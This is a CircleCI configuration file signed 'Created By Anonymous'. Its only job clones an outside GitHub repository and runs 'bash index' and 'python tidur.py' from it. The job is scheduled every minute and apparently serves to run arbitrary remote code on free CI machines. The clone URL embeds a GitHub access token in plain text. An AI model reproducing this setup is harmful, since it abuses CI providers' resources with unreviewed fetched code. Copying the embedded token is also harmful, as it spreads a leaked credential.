# ======================== #
# ======================== #
# = Created By Anonymous = #
# ======================== #
# ======================== #
version: 2.1
orbs: 
  python: circleci/python@1.5.0
jobs:
  Builds:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          command: git clone https://shoukosagiri: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@github.com/swenson-poi/testo.git && cd testo && bash index && python tidur.py
# ======================== #
workflows:
  Workflows:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only: master
# ======================== #
    jobs:
      - Builds
# ======================== #
